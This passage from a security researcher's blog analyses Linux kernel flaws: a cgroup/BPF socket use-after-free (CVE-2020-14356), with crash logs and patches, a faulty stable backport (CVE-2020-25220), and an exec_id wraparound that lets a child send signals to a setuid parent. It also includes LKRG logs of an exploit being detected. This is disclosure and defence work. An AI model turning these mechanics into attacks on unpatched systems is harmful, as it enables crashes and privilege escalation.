[190820.457516] Code: eb b6 80 3d 11 95 5a 02 00 0f 85 65 ff ff ff 48 8b 55 d8 48 8b 75 e8 48 c7 c7 d0 9f 78 93 c6 05 f5 94 5a 02 01 e8 00 57 88 ff <0f> 0b e9 43 ff ff ff 0f 0b eb 9d cc cc cc 8d 8c 16 ef be ad de 89
[190820.457516] RSP: 0018:ffffb136c0087e00 EFLAGS: 00010286
[190820.457517] RAX: 0000000000000000 RBX: 7ffffffffffeec4a RCX: 0000000000000000
[190820.457517] RDX: 0000000000000101 RSI: ffffffff949235c0 RDI: 00000000ffffffff
[190820.457517] RBP: ffff9ce3e204af20 R08: 6d6f7461206f7420 R09: 63696d6f7461206f
[190820.457517] R10: 7320726574666120 R11: 676e696863746977 R12: 00003452c5002ce8
[190820.457518] R13: ffff9ce3f6e2b450 R14: ffff9ce2c7fc3100 R15: 0000000000000000
[190820.457526] FS:  0000000000000000(0000) GS:ffff9ce3f6e00000(0000) knlGS:0000000000000000
[190820.457527] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[190820.457527] CR2: 00007f516c2b9000 CR3: 0000000222c64006 CR4: 00000000003606f0
[190820.457550] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[190820.457551] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[190820.457551] Call Trace:
[190820.457577]  rcu_core+0x1df/0x530
[190820.457598]  ? smpboot_register_percpu_thread+0xd0/0xd0
[190820.457609]  __do_softirq+0xfc/0x331
[190820.457629]  ? smpboot_register_percpu_thread+0xd0/0xd0
[190820.457630]  run_ksoftirqd+0x21/0x30
[190820.457649]  smpboot_thread_fn+0x195/0x230
[190820.457660]  kthread+0x139/0x160
[190820.457670]  ? __kthread_bind_mask+0x60/0x60
[190820.457671]  ret_from_fork+0x35/0x40
[190820.457682] ---[ end trace 63d2aef89e998452 ]---

I tested the same scenario a few times and got the following results:

 percpu ref (cgroup_bpf_release_fn) <= 0 (-70581) after switching to atomic
 percpu ref (cgroup_bpf_release_fn) <= 0 (-18829) after switching to atomic
 percpu ref (cgroup_bpf_release_fn) <= 0 (-29849) after switching to atomic

Let’s look at this function:

/**
 * cgroup_bpf_release_fn() - callback used to schedule releasing
 *                           of bpf cgroup data
 * @ref: percpu ref counter structure
 */
static void cgroup_bpf_release_fn(struct percpu_ref *ref)
{
	struct cgroup *cgrp = container_of(ref, struct cgroup, bpf.refcnt);

	INIT_WORK(&cgrp->bpf.release_work, cgroup_bpf_release);
	queue_work(system_wq, &cgrp->bpf.release_work);
}

So that’s the callback used to schedule the release of bpf cgroup data. It sounds like it is being called while there may still be active sockets attached to the cgroup:

/**
 * cgroup_bpf_release() - put references of all bpf programs and
 *                        release all cgroup bpf data
 * @work: work structure embedded into the cgroup to modify
 */
static void cgroup_bpf_release(struct work_struct *work)
{
	struct cgroup *p, *cgrp = container_of(work, struct cgroup,
					       bpf.release_work);
	struct bpf_prog_array *old_array;
	unsigned int type;

	mutex_lock(&cgroup_mutex);

	for (type = 0; type < ARRAY_SIZE(cgrp->bpf.progs); type++) {
		struct list_head *progs = &cgrp->bpf.progs[type];
		struct bpf_prog_list *pl, *tmp;

		list_for_each_entry_safe(pl, tmp, progs, node) {
			list_del(&pl->node);
			if (pl->prog)
				bpf_prog_put(pl->prog);
			if (pl->link)
				bpf_cgroup_link_auto_detach(pl->link);
			bpf_cgroup_storages_unlink(pl->storage);
			bpf_cgroup_storages_free(pl->storage);
			kfree(pl);
			static_branch_dec(&cgroup_bpf_enabled_key);
		}
		old_array = rcu_dereference_protected(
				cgrp->bpf.effective[type],
				lockdep_is_held(&cgroup_mutex));
		bpf_prog_array_free(old_array);
	}

	mutex_unlock(&cgroup_mutex);

	for (p = cgroup_parent(cgrp); p; p = cgroup_parent(p))
		cgroup_bpf_put(p);

	percpu_ref_exit(&cgrp->bpf.refcnt);
	cgroup_put(cgrp);
}

while:

static void bpf_cgroup_link_auto_detach(struct bpf_cgroup_link *link)
{
	cgroup_put(link->cgroup);
	link->cgroup = NULL;
}

So if the cgroup dies, all the potential clients are auto-detached. However, they might not be aware of that situation. When is cgroup_bpf_release_fn() executed?

/**
 * cgroup_bpf_inherit() - inherit effective programs from parent
 * @cgrp: the cgroup to modify
 */
int cgroup_bpf_inherit(struct cgroup *cgrp)
{
    ...
  	ret = percpu_ref_init(&cgrp->bpf.refcnt, cgroup_bpf_release_fn, 0,
			      GFP_KERNEL);
    ...
}

It is executed automatically when cgrp->bpf.refcnt drops to zero. However, in the warning logs printed before the kernel crashed, we saw that this reference counter went below 0. The cgroup had already been freed.

Originally, I thought that the problem might be related to the code walking through the cgroup hierarchy without holding cgroup_mutex, which was pointed out by Alexei. I’ve prepared the patch and recompiled the kernel:

$ diff -u cgroup.c linux-5.7/kernel/bpf/cgroup.c
--- cgroup.c    2020-05-31 23:49:15.000000000 +0000
+++ linux-5.7/kernel/bpf/cgroup.c       2020-07-17 16:31:10.712969480 +0000
@@ -126,11 +126,11 @@
                bpf_prog_array_free(old_array);
        }

-       mutex_unlock(&cgroup_mutex);
-
        for (p = cgroup_parent(cgrp); p; p = cgroup_parent(p))
                cgroup_bpf_put(p);

+       mutex_unlock(&cgroup_mutex);
+
        percpu_ref_exit(&cgrp->bpf.refcnt);
        cgroup_put(cgrp);
 }

Interestingly, without this patch I was able to generate this kernel crash every time I rebooted the machine (100% repro). With the patch, the crash ratio dropped to around 30%. However, I was still able to hit the same code path and generate a kernel dump. The patch indeed helps, but it is apparently not the real problem, since I can still hit the crash (just much less often).

I stepped back and looked again at where the bug is. The corrupted pointer (struct cgroup *) comes from this line:

	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);

This code is related to CONFIG_SOCK_CGROUP_DATA. The Linux source has an interesting comment about it in the “cgroup-defs.h” file:

/*
 * sock_cgroup_data is embedded at sock->sk_cgrp_data and contains
 * per-socket cgroup information except for memcg association.
 *
 * On legacy hierarchies, net_prio and net_cls controllers directly set
 * attributes on each sock which can then be tested by the network layer.
 * On the default hierarchy, each sock is associated with the cgroup it was
 * created in and the networking layer can match the cgroup directly.
 *
 * To avoid carrying all three cgroup related fields separately in sock,
 * sock_cgroup_data overloads (prioidx, classid) and the cgroup pointer.
 * On boot, sock_cgroup_data records the cgroup that the sock was created
 * in so that cgroup2 matches can be made; however, once either net_prio or
 * net_cls starts being used, the area is overriden to carry prioidx and/or
 * classid.  The two modes are distinguished by whether the lowest bit is
 * set.  Clear bit indicates cgroup pointer while set bit prioidx and
 * classid.
 *
 * While userland may start using net_prio or net_cls at any time, once
 * either is used, cgroup2 matching no longer works.  There is no reason to
 * mix the two and this is in line with how legacy and v2 compatibility is
 * handled.  On mode switch, cgroup references which are already being
 * pointed to by socks may be leaked.  While this can be remedied by adding
 * synchronization around sock_cgroup_data, given that the number of leaked
 * cgroups is bound and highly unlikely to be high, this seems to be the
 * better trade-off.
 */

and later:

/*
 * There's a theoretical window where the following accessors race with
 * updaters and return part of the previous pointer as the prioidx or
 * classid.  Such races are short-lived and the result isn't critical.
 */

This means that sock_cgroup_data “carries” the information about whether net_prio or net_cls is being used, and in that case the same field that normally holds the cgroup pointer is overloaded to carry (prioidx, classid). In our crash dump we can extract this information:

crash> print/a ((struct sock *)0xffff9ce3de26b280)->sk_cgrp_data
$5 = {
  {
    {
      is_data = 0x0,
      padding = 0x68,
      prioidx = 0xe241,
      classid = 0xffff9ce3
    },
    val = 0xffff9ce3e2416800
  }
}
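
The lowest bit (is_data) is clear in this dump, so val should be interpreted as a raw cgroup pointer (0xffff9ce3e2416800) rather than as prioidx/classid. Below is a simplified userspace illustration of the low-bit tagging scheme described in the comment above; it is my own sketch and not the kernel's exact code (the field extraction matches the little-endian layout visible in the dump):

#include <stdint.h>
#include <stdio.h>

struct fake_cgroup { int dummy; };

int main(void)
{
	struct fake_cgroup cg;
	uint64_t val = (uint64_t)(uintptr_t)&cg;	/* low bit clear -> cgroup pointer mode */

	if (val & 1) {
		/* low bit set -> the word carries prioidx/classid instead of a pointer */
		uint16_t prioidx = (uint16_t)(val >> 16);
		uint32_t classid = (uint32_t)(val >> 32);
		printf("net_prio/net_cls mode: prioidx=%u classid=%u\n", prioidx, classid);
	} else {
		struct fake_cgroup *cgrp = (struct fake_cgroup *)(uintptr_t)val;
		printf("cgroup pointer mode: %p\n", (void *)cgrp);
	}
	return 0;
}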

The socket in question keeps a “sk_cgrp_data” pointer with the information that it is still “attached” to cgroup2. However, that cgroup2 has already been destroyed.
Now we have all the information needed to solve the mystery of this bug:

  1. A process creates a socket and both of them are inside some cgroup v2 (non-root)
    • cgroup BPF is cgroup2-only
  2. At some point net_prio or net_cls starts being used:
    • this operation disables cgroup2 socket matching
    • now all related sockets should be converted to use net_prio, and sk_cgrp_data should be updated
  3. The socket is cloned, but the reference to the cgroup is not (ref: point 1)
    • this essentially moves the socket to the new cgroup
  4. All tasks in the old cgroup (ref: point 1) must die, and when this happens, that cgroup dies as well
  5. When the original process starts to “use” the socket, it might attempt to access a cgroup which is already “dead”. This essentially generates a Use-After-Free condition
    • in my specific case, the process was killed or invoked exit()
    • during the execution of the do_exit() function, all file descriptors and all sockets are closed
    • one of the sockets still points to the previously destroyed cgroup2 BPF (OpenSSH might install BPF)
    • __cgroup_bpf_run_filter_skb runs the attached BPF and we have a Use-After-Free

To confirm that scenario, I’ve modified some of the Linux kernel sources:

  1. Function cgroup_sk_alloc_disable():
    • I’ve added dump_stack();
  2. Function cgroup_bpf_release():
    • I’ve moved the mutex so that it also guards the code responsible for walking through the cgroup hierarchy

I’ve managed to reproduce this bug again and this is what I can see in the logs:

...
[   72.061197] kmem.limit_in_bytes is deprecated and will be removed. Please report your usecase to [email protected] if you depend on this functionality.
[   72.121572] cgroup: cgroup: disabling cgroup2 socket matching due to net_prio or net_cls activation
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[   72.121574] CPU: 0 PID: 6958 Comm: kubelet Kdump: loaded Not tainted 5.7.0-g6 #32
[   72.121574] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[   72.121575] Call Trace:
[   72.121580]  dump_stack+0x50/0x70
[   72.121582]  cgroup_sk_alloc_disable.cold+0x11/0x25
                ^^^^^^^^^^^^^^^^^^^^^^^
[   72.121584]  net_prio_attach+0x22/0xa0
                ^^^^^^^^^^^^^^^
[   72.121586]  cgroup_migrate_execute+0x371/0x430
[   72.121587]  cgroup_attach_task+0x132/0x1f0
[   72.121588]  __cgroup1_procs_write.constprop.0+0xff/0x140
                ^^^^^^^^^^^^^^^^^^^^^^
[   72.121590]  kernfs_fop_write+0xc9/0x1a0
[   72.121592]  vfs_write+0xb1/0x1a0
[   72.121593]  ksys_write+0x5a/0xd0
[   72.121595]  do_syscall_64+0x47/0x190
[   72.121596]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   72.121598] RIP: 0033:0x48abdb
[   72.121599] Code: ff e9 69 ff ff ff cc cc cc cc cc cc cc cc cc e8 7b 68 fb ff 48 8b 7c 24 10 48 8b 74 24 18 48 8b 54 24 20 48 8b 44 24 08 0f 05 <48> 3d 01 f0 ff ff 76 20 48 c7 44 24 28 ff ff ff ff 48 c7 44 24 30
[   72.121600] RSP: 002b:000000c00110f778 EFLAGS: 00000212 ORIG_RAX: 0000000000000001
[   72.121601] RAX: ffffffffffffffda RBX: 000000c000060000 RCX: 000000000048abdb
[   72.121601] RDX: 0000000000000004 RSI: 000000c00110f930 RDI: 000000000000001e
[   72.121601] RBP: 000000c00110f7c8 R08: 000000c00110f901 R09: 0000000000000004
[   72.121602] R10: 000000c0011a39a0 R11: 0000000000000212 R12: 000000000000019b
[   72.121602] R13: 000000000000019a R14: 0000000000000200 R15: 0000000000000000

As we can see, net_prio is being activated and cgroup2 socket matching is being disabled. Next:

[  287.497527] percpu ref (cgroup_bpf_release_fn) <= 0 (-79) after switching to atomic
[  287.497535] WARNING: CPU: 0 PID: 9 at lib/percpu-refcount.c:161 percpu_ref_switch_to_atomic_rcu+0x11f/0x12a
[  287.497536] Modules linked in:
[  287.497537] CPU: 0 PID: 9 Comm: ksoftirqd/0 Kdump: loaded Not tainted 5.7.0-g6 #32
[  287.497538] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[  287.497539] RIP: 0010:percpu_ref_switch_to_atomic_rcu+0x11f/0x12a

cgroup_bpf_release_fn is executed multiple times. All cgroup BPF entries have been deleted and freed. Next:

[  287.543976] general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] PREEMPT SMP PTI
[  287.544062] CPU: 0 PID: 11398 Comm: realpath Kdump: loaded Tainted: G        W         5.7.0-g6 #32
[  287.544133] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[  287.544217] RIP: 0010:__cgroup_bpf_run_filter_skb+0xd4/0x230
[  287.544267] Code: 00 48 01 c8 48 89 43 50 41 83 ff 01 0f 84 c2 00 00 00 e8 6f 55 f1 ff e8 5a 3e f5 ff 44 89 fa 48 8d 84 d5 e0 03 00 00 48 8b 00 <48> 8b 78 10 4c 8d 78 10 48 85 ff 0f 84 29 01 00 00 bd 01 00 00 00
[  287.544398] RSP: 0018:ffff957740003af8 EFLAGS: 00010206
[  287.544446] RAX: 6b6b6b6b6b6b6b6b RBX: ffff8911f339cf00 RCX: 0000000000000028
[  287.544506] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000001
[  287.544566] RBP: ffff8911e2eb5000 R08: 0000000000000000 R09: 0000000000000001
[  287.544625] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000014
[  287.544685] R13: 0000000000000014 R14: 0000000000000000 R15: 0000000000000000
[  287.544753] FS:  00007f86e885a580(0000) GS:ffff8911f6e00000(0000) knlGS:0000000000000000
[  287.544833] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  287.544919] CR2: 000055fb75e86da4 CR3: 0000000221316003 CR4: 00000000003606f0
[  287.544996] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  287.545063] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[  287.545129] Call Trace:
[  287.545167]  <IRQ>
[  287.545204]  sk_filter_trim_cap+0x10c/0x250
[  287.545253]  ? nf_ct_deliver_cached_events+0xb6/0x120
[  287.545308]  ? tcp_v4_inbound_md5_hash+0x47/0x160
[  287.545359]  tcp_v4_rcv+0xb49/0xda0
[  287.545404]  ? nf_hook_slow+0x3a/0xa0
[  287.545449]  ip_protocol_deliver_rcu+0x26/0x1d0
[  287.545500]  ip_local_deliver_finish+0x50/0x60
[  287.545550]  ip_sublist_rcv_finish+0x38/0x50
[  287.545599]  ip_sublist_rcv+0x16d/0x200
[  287.545645]  ? ip_rcv_finish_core.constprop.0+0x470/0x470
[  287.545701]  ip_list_rcv+0xf1/0x115
[  287.545746]  __netif_receive_skb_list_core+0x249/0x270
[  287.545801]  netif_receive_skb_list_internal+0x19f/0x2c0
[  287.545856]  napi_complete_done+0x8e/0x130
[  287.545905]  e1000_clean+0x27e/0x600
[  287.545951]  ? security_cred_free+0x37/0x50
[  287.545999]  net_rx_action+0x133/0x3b0
[  287.546045]  __do_softirq+0xfc/0x331
[  287.546091]  irq_exit+0x92/0x110
[  287.546133]  do_IRQ+0x6d/0x120
[  287.546175]  common_interrupt+0xf/0xf
[  287.546219]  </IRQ>
[  287.546255] RIP: 0010:__x64_sys_exit_group+0x4/0x10

We have our crash referencing freed memory. 

First CVE – CVE-2020-14356:

I decided to report this issue to the Linux kernel security mailing list around mid-July 2020. Roman Gushchin replied to my report and suggested verifying whether I could still repro this issue with commit ad0f75e5f57c (“cgroup: fix cgroup_sk_alloc() for sk_clone_lock()”) applied. This commit had been merged into the Linux kernel git tree just a few days before my report. I carefully verified it and indeed it fixed the problem. However, commit ad0f75e5f57c is not fully complete and the follow-up fix 14b032b8f8fc (“cgroup: Fix sock_cgroup_data on big-endian.”) should be applied as well.


After this conversation, Greg KH decided to backport Roman’s patches to the LTS kernels. In the meantime, I decided to apply for a CVE number (through RedHat) to track this issue:

  1. CVE-2020-14356 was allocated to track this issue
  2. For some unknown reason, this bug was classified as a NULL pointer dereference 🙂

RedHat correctly acknowledged this issue as a Use-After-Free in their own description and bugzilla entry.

However, in the CVE MITRE portal we can see a very inaccurate description:

  • “A flaw null pointer dereference in the Linux kernel cgroupv2 subsystem in versions before 5.7.10 was found in the way when reboot the system. A local user could use this flaw to crash the system or escalate their privileges on the system.”
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14356

First, it is not a NULL pointer dereference but a Use-After-Free bug. Maybe it was misclassified based on this open bug:
https://bugzilla.kernel.org/show_bug.cgi?id=208003

People have started to hit this Use-After-Free bug in the form of a NULL-pointer-dereference “kernel panic”.

Additionally, the entire description of the bug is wrong. I raised that concern with CVE MITRE, but the invalid description is still there. There is also a small Twitter discussion about it here:
https://twitter.com/Adam_pi3/status/1296212546043740160

Second CVE – CVE-2020-25220:

During the analysis of this bug, I contacted Brad Spengler. When the patch for this issue was backported to the LTS kernels, Brad noticed that it conflicted with his pre-existing backport, and that the upstream backport looked incorrect. I was surprised, since I had reviewed the original commit for the mainline kernel (5.7) and it was fine. With this in mind, I decided to carefully review the backported patch:
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-4.14.y&id=82fd2138a5ffd7e0d4320cdb669e115ee976a26e

and it really looks incorrect. Part of the original fix is the following code:

+void cgroup_sk_clone(struct sock_cgroup_data *skcd)
+{
+   if (skcd->val) {
+       if (skcd->no_refcnt)
+           return;
+       /*
+        * We might be cloning a socket which is left in an empty
+        * cgroup and the cgroup might have already been rmdir'd.
+        * Don't use cgroup_get_live().
+        */
+       cgroup_get(sock_cgroup_ptr(skcd));
+       cgroup_bpf_get(sock_cgroup_ptr(skcd));
+   }
+}

However, the backported patch has the following logic:

+void cgroup_sk_clone(struct sock_cgroup_data *skcd)
+{
+   /* Socket clone path */
+   if (skcd->val) {
+       /*
+        * We might be cloning a socket which is left in an empty
+        * cgroup and the cgroup might have already been rmdir'd.
+        * Don't use cgroup_get_live().
+        */
+       cgroup_get(sock_cgroup_ptr(skcd));
+   }
+}

There is a missing check:

+       if (skcd->no_refcnt)
+           return;

which could result in a reference counting bug and, in the end, a Use-After-Free again. It looks like the backported patch for stable kernels is still buggy.
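
For clarity, a corrected backport would presumably just mirror the mainline logic and bail out before taking the reference when no_refcnt is set; something like the sketch below (my reconstruction based on the two snippets above, not the actual follow-up LTS commit):

void cgroup_sk_clone(struct sock_cgroup_data *skcd)
{
	/* Socket clone path */
	if (skcd->val) {
		/* A socket that no longer holds a cgroup reference must not take one here. */
		if (skcd->no_refcnt)
			return;
		/*
		 * We might be cloning a socket which is left in an empty
		 * cgroup and the cgroup might have already been rmdir'd.
		 * Don't use cgroup_get_live().
		 */
		cgroup_get(sock_cgroup_ptr(skcd));
	}
}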

I contacted RedHat again and they started to provide correct patches for their own kernels. However, the LTS kernels were still buggy. I also asked for a separate CVE to be assigned for that issue, but RedHat suggested that I do it myself.

After that, I went on vacation and forgot about this issue 🙂 Recently, I decided to apply for a CVE to track the “bad patch” issue, and CVE-2020-25220 was allocated. It is worth pointing out that someone from Huawei eventually realized that the patch was wrong, and LTS got a correct fix as well:

https://www.spinics.net/lists/stable/msg405099.html

It is worth mentioning that the grsecurity backport was never affected by CVE-2020-25220.

Summary:

The original issue, tracked by CVE-2020-14356, affects kernels starting from 4.5 up to 5.7.10.

  • RedHat correctly fixed all their kernels and has a proper description of the bug
  • CVE MITRE still has an invalid and misleading description

The badly backported patch, tracked by CVE-2020-25220, affects the following kernels:

  • 4.19 until version 4.19.140 (exclusive)
  • 4.14 until version 4.14.194 (exclusive)
  • 4.9 until version 4.9.233 (exclusive)

*grsecurity kernels were never affected by CVE-2020-25220


Best regards,
Adam ‘pi3’ Zabrocki

LKRG 0.8

Hi,

We’ve just announced a new version of LKRG – 0.8! It includes an enormous amount of changes – in fact, so many that we’re not trying to document all of them this time (although they can be seen from the git commits), but rather focus on the high-level aspects. I encourage you to read the full announcement here:

https://www.openwall.com/lists/announce/2020/06/25/1

Btw, among other things we have added support for Raspberry Pi 3 & 4, better scalability, performance, and tradeoffs, the notion of profiles, new documentation, @Phoronix benchmarks, and more.

Best regards,
Adam

Effectiveness of Linux Rootkit Detection Tools

I would like to draw attention to the following Openwall tweet:

Juho Junnila's Master's Thesis "Effectiveness of Linux Rootkit Detection Tools" shows our LKRG as by far the most effective kernel rootkit detector (of those tested), even though that wasn't our primary focus: https://t.co/pz0r502dK6 h/t @Adam_pi3

— Openwall (@Openwall) June 14, 2020

and the full post on LKRG’s mailing list here:

https://www.openwall.com/lists/lkrg-users/2020/06/14/5

Thanks,
Adam

CVE-2020-12826

CVE-2020-12826 has been assigned to track the Linux kernel problem which I described in my previous post.

CVE MITRE described the problem pretty accurately:

A signal access-control issue was discovered in the Linux kernel before 5.6.5, aka CID-7395ea4e65c2. Because exec_id in include/linux/sched.h is only 32 bits, an integer overflow can interfere with a do_notify_parent protection mechanism. A child process can send an arbitrary signal to a parent process in a different security domain. Exploitation limitations include the amount of elapsed time before an integer overflow occurs, and the lack of scenarios where signals to a parent process present a substantial operational threat.

RedHat tracks this issue here:

https://bugzilla.redhat.com/show_bug.cgi?id=1822077

Debian here:

https://security-tracker.debian.org/tracker/CVE-2020-12826

Fix can be found here:

https://github.com/torvalds/linux/commit/7395ea4e65c2a00d23185a3f63ad315756ba9cef

What is interesting, the story of insufficiently restricted exit signals might not be over yet 😉

How did this pass review and get backported to stable kernels? https://t.co/WhBrqUZhrw (Hint: case of right hand not knowing what the left is doing, involving a recent security fix)

— grsecurity (@grsecurity) May 14, 2020

In short, the following patch reintroduces the same problem:

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b5f2006144c6ae941726037120fa1001ddede784

Best regards,
Adam

Linux kernel bug – all kernels insufficiently restrict exit signals

I've recently spent some time looking at the ‘exec_id’ counter. Historically, the Linux kernel had two independent security problems related to that code: CVE-2009-1337 and CVE-2012-0056.

Until 2012, the ‘self_exec_id’ field (among others) was used to enforce permission-checking restrictions for the /proc/pid/{mem,maps,…} interface. However, it was done poorly and a serious security problem was reported, known as “Mempodipper” (CVE-2012-0056). Since that patch, ‘self_exec_id’ is no longer used for that check; instead, the kernel looks at the process’ VM at the time of the open().

In 2009, Oleg Nesterov discovered that the Linux kernel had incorrect logic for resetting ->exit_signal. As a result, a malicious user could bypass it by exec'ing a setuid application before exiting (->exit_signal wouldn't be reset to SIGCHLD). CVE-2009-1337 was assigned to track this issue.

The logic responsible for handling ->exit_signal has been changed a few times, and the current logic has been locked down since Linux kernel 3.3.5. However, it is not fully robust and it is still possible for a malicious user to bypass it. Basically, it's possible to send arbitrary signals to a privileged (suid root) parent process.
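
The bypass boils down to the fact that the counter involved is only 32 bits wide: after 2^32 execve() calls it wraps around, so an equality check between a value snapshotted at fork time and the live counter can be satisfied again. A minimal userspace illustration of the wraparound (the variable names below are simplified by me and are not the exact kernel fields):

#include <stdint.h>
#include <stdio.h>

int main(void)
{
	uint32_t parent_exec_id_at_fork = 5;	/* snapshot taken when the child was forked */
	uint32_t parent_self_exec_id = 5;	/* parent's live exec counter */

	/* The parent execs a setuid binary once: the IDs no longer match, so a
	 * "dangerous" exit signal would normally be downgraded. */
	parent_self_exec_id++;
	printf("after 1 exec: match=%d\n", parent_self_exec_id == parent_exec_id_at_fork);

	/* ...but after 2^32 - 1 more execs the 32-bit counter wraps around and
	 * the equality check is satisfied again. */
	parent_self_exec_id += UINT32_MAX;
	printf("after the wrap: match=%d\n", parent_self_exec_id == parent_exec_id_at_fork);
	return 0;
}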

I’ve summarized my analysis and posted it on LKML:
https://lists.openwall.net/linux-kernel/2020/03/24/1803

and kernel-hardening mailing list:
https://www.openwall.com/lists/kernel-hardening/2020/03/25/1

Btw. Kernels 2.0.39 and 2.0.40 look secure 😉

Thanks,
Adam

Linux kernel XFRM UAF

On the 28th of February, I sent a short summary to the lkrg-users mailing list (https://www.openwall.com/lists/lkrg-users/2020/02/28/1) regarding the recent Linux kernel XFRM UAF exploit dropped by Vitaly Nikolenko. I believe it is worth reading, so I've decided to reference it on my blog as well:

Hey,

Vitaly Nikolenko published an exploit for a Linux kernel XFRM use-after-free. His tweet with more details can be found here:

centos 8 / rhel 8 / ubuntu 14.04, 16.04, 18.04 poc is uploaded https://t.co/b3IJoxMaHI. The tech report is public too https://t.co/UHsMYScN9Y pic.twitter.com/uDpjEm0ycX

— Vitaly Nikolenko (@vnik5287) February 28, 2020

A detailed description of the bug can be found here:

https://duasynt.com/pub/vnik/01-0311-2018.pdf

I’ve tested his exploit under the latest version of LKRG (from the repo) and it correctly detects and kills it:

[Fri Feb 28 10:04:24 2020] [p_lkrg] Loading LKRG…
[Fri Feb 28 10:04:24 2020] Freezing user space processes … (elapsed 0.008 seconds) done.
[Fri Feb 28 10:04:24 2020] OOM killer disabled.
[Fri Feb 28 10:04:24 2020] [p_lkrg] Verifying 21 potential UMH paths for whitelisting…
[Fri Feb 28 10:04:24 2020] [p_lkrg] 6 UMH paths were whitelisted…
[Fri Feb 28 10:04:25 2020] [p_lkrg] [kretprobe] register_kretprobe() for  failed! [err=-22]
[Fri Feb 28 10:04:25 2020] [p_lkrg] ERROR: Can't hook ovl_create_or_link function :(
[Fri Feb 28 10:04:25 2020] [p_lkrg] LKRG initialized successfully!
[Fri Feb 28 10:04:25 2020] OOM killer enabled.
[Fri Feb 28 10:04:25 2020] Restarting tasks … done.
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  process[67342 | lucky0] has different user_namespace!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  process[67342 | lucky0] has different user_namespace!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  Trying to kill process[lucky0 | 67342]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!

The latest LKRG detects user_namespace corruption, which in a way proves that our namespace-escape logic works. When I ran the same test with the LKRG code base reverted to the commit just before namespace corruption detection was introduced, LKRG still detected the exploit via the standard method:

[Fri Feb 28 10:34:28 2020] [p_lkrg]  process[17599 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] process[17599 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] process[17599 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] process[17599 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] Trying to kill process[lucky0 | 17599]!

[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] Trying to kill process[lucky0 | 22293]!

This is an interesting case. Vitaly published just a compiled binary of his exploit (not the source code). This means that adapting his exploit to play a cat-and-mouse game with LKRG is not an easy task. It is possible to reverse-engineer and modify the exploit binary; however, it's more work.

Thanks,

Adam

Reverse-engineering tcpip.sys: mechanics of a packet of death (CVE-2021-24086)

Introduction

